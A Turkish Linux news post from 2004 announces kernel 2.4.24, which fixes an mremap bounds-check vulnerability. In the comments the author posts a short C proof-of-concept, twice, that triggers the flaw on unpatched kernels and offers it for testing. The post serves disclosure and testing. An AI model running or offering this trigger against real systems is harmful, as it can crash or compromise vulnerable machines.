Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Yılın Penguenleri Ödülleri için aday gösterme süreci başladı
dfisek
7 Nisan 2005, 1 dakika okuma süresi

Linux Kullanıcılari Derneği, her yıl olduğu gibi Yılın Penguenleri Ödulleri'ni veriyor. Geçen yıl olduğu gibi 6 kategoride verilecek olan ödüller, sizlerin göstereceğiniz adaylar arasından dernek üyeleri tarafından yapılacak oylama ile belirlenecek. [ Ayrıntılı Bilgi ]
Editörün notu: Şimdiden güzide editörümüz Emre "FZ" Sevinç, En Çalışkan Penguen, Fazlamesai.net televizyon programı da En İyi Basılı/Görsel İçerik Çalışması kategorilerinde aday gösterilmişler.

Fedora Core 4 sahnede... ;)
St
13 Haziran 2005, 1 dakika okuma süresi

GNU/Linux dünyasının medar-ı iftiharlarından Fedora, 4. sürümünü bugün itibariyle duyurdu.

Yeni sürümün getirdiği başlıca yenilikler:

Linux belgeseli Türkiye`de
tupac
14 Mayıs 2002, 1 dakika okuma süresi

Serbest Yazılımın 'baba'larını izlemek için bu fırsat kaçmaz! Evet. Linux Belgeseli, 16-19 Mayıs tarihleri arasında yapılacak Linux Şenliğinde gösterilecek. Ayrıntılar; www.bilisimcumhuriyeti.com/thecode/

Slackware 10.2 Duyuruldu
GolgeHan
16 Eylül 2005, 1 dakika okuma süresi

Unix'e en çok benzeyen Linux işletim sistemi Slackware'in 10.2 sürümü duyuruldu. Çekirdek 2.4.31, fakat kurulumda açılış esnasında SCSI ,RAID, SATA desteği olan test26.s ile sistemi kurabilirsiniz. Masaüstü ortamı olarak Kde 3.4.2 ve XFce 4.2.2 dağıtımla birlikte sunulmakta.

Ayrıntılı bilgi için: http://www.slackware.com/announce/10.2.php

Slackware Linux Türkiye Açıldı!
anonim
16 Mayıs 2006, 1 dakika okuma süresi

Resmi Slackware Linux Türkiye temsilciliği www.slackware.org.tr adresinde açılmıştır. Tüm slackware fanatiklerine duyurulur.